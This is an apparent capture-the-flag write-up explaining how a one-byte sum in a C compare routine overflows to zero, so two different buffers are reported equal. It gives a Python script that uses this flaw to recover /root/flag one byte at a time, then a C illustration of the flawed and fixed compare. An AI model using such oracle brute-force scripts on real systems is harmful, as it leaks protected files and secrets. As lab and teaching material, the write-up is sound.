The average guy: char + char = char, nothing wrong with that. keer: char + char = overflow! Call him out!
We know a char variable occupies one byte, equivalent to an unsigned byte, so it represents the range 0x0-0xff. The sum of two chars therefore ranges over 0x0-0x1fe, but a char can only hold one byte of data, so the carry produced by adding two chars is simply discarded. For example, 0x7d + 0x83 = 0x100 -> 0x0. Once you get this point, look at the for-loop condition again and you can spot the catch.
When buf2[i] + buf1[i] == 0x100 the for loop terminates and the function returns 0. Under the program's normal flow it cannot return 0 unless buf1 and buf2 are completely identical, but now compare also returns 0 as long as the corresponding bytes of buf1 and buf2 at any position add up to 0x100.
from subprocess import Popen, PIPE

# Recover /root/flag one byte at a time: the compare returns 0 as soon as
# payload[i] + flag[i] wraps from 0x100 to 0, so a hit with candidate byte i
# at the first unknown position means flag[i] == 0x100 - i.
fix = b''            # the prefix of the flag recovered so far
done = False
while not done:
    for i in range(0x100):
        payload = fix + bytes([i])             # known prefix + candidate byte
        with open('/tmp/ktql', 'wb') as f:
            f.write(payload)
        p = Popen(['/root/diff', '/tmp/ktql', '/root/flag'], stdout=PIPE)
        res = p.stdout.read()
        if res != b'1':                        # compare stopped early: a hit
            if i:                              # candidate i + flag byte == 0x100
                fix += bytes([0x100 - i])      # append the real flag byte
                print(fix)
            else:                              # only a 0x00 flag byte sums to 0
                done = True                    # with candidate 0x00: end of flag
            break
    else:
        done = True                            # no candidate hit: nothing left
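As an added illustration (not the challenge's own source, which this page does not show), here is a compare routine of the shape the writeup describes, with the per-byte sum stored in a one-byte variable, beside a fixed version that does the arithmetic at int width; the function names, the loop bound and the sample buffers are assumptions constructed for the demo.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical shape of the flawed compare (an assumption, not the challenge
 * binary): the per-byte sum lands in a one-byte variable, so 0x7d + 0x83 =
 * 0x100 is truncated to 0 and the loop exits with 0 ("equal") even though the
 * bytes differ.  Returns 0 for "equal", 1 for "different". */
int compare_truncated(const unsigned char *buf1, const unsigned char *buf2, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        unsigned char sum = buf1[i] + buf2[i];   /* the carry bit is dropped here */
        if (sum == 0)                            /* meant to catch two NULs only */
            return 0;
        if (buf1[i] != buf2[i])
            return 1;
    }
    return 0;
}

/* Hardened version: keep the sum at int width so 0x100 stays 0x100, and keep
 * the byte-by-byte equality test as the only thing that decides "equal". */
int compare_fixed(const unsigned char *buf1, const unsigned char *buf2, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        int sum = buf1[i] + buf2[i];             /* 0 only when both bytes are 0 */
        if (sum == 0)
            return 0;
        if (buf1[i] != buf2[i])
            return 1;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample: identical prefix, then 0x7d versus 0x83. */
    const unsigned char secret[] = "ab\x83";
    const unsigned char guess[]  = "ab\x7d";
    printf("truncated: %d (0 = wrongly reported equal)\n",
           compare_truncated(guess, secret, 3));
    printf("fixed:     %d (1 = correctly reported different)\n",
           compare_fixed(guess, secret, 3));
    return 0;
}
```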